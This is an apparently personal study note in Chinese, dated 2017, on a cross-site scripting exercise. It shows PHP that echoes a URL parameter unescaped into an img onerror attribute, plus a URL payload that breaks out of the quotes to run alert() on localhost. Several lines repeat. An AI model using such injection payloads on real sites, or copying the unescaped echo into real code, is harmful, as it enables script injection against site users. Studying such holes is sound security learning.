这是自动评论代码所写的document.getElementById('js-pl-textarea').value和$('#js-pl-submit').click();
2017-08-10
原始代码:<img src='x' onerror='var a="123 <?=$_GET["key"];?>"; ' /> //onerror单引号中的变量a双引号中的123和从浏览器URL获得key。这条代码总共三对引号
URL: localhost/www/QUIZ.php?key=%26quot;;alert(3);//
PS://不能去掉。 %26quot表示双引号
服务器解析后:
<img src='x' onerror="var a="123";alert(3);//";">
//a变量内容123 alert从中跳出,//注释掉双引号 总共两对引号
URL: localhost/www/QUIZ.php?key=%26quot;;alert(3);//
PS://不能去掉。 %26quot表示双引号
服务器解析后:
<img src='x' onerror="var a="123";alert(3);//";">
//a变量内容123 alert从中跳出,//注释掉双引号 总共两对引号
2017-07-12
http://localhost/test/demo6.php?key=%26quot;;alert(1);//
解析后:onerror="var a = "123";alert(1);//>";"
解析后:onerror="var a = "123";alert(1);//>";"
2017-06-23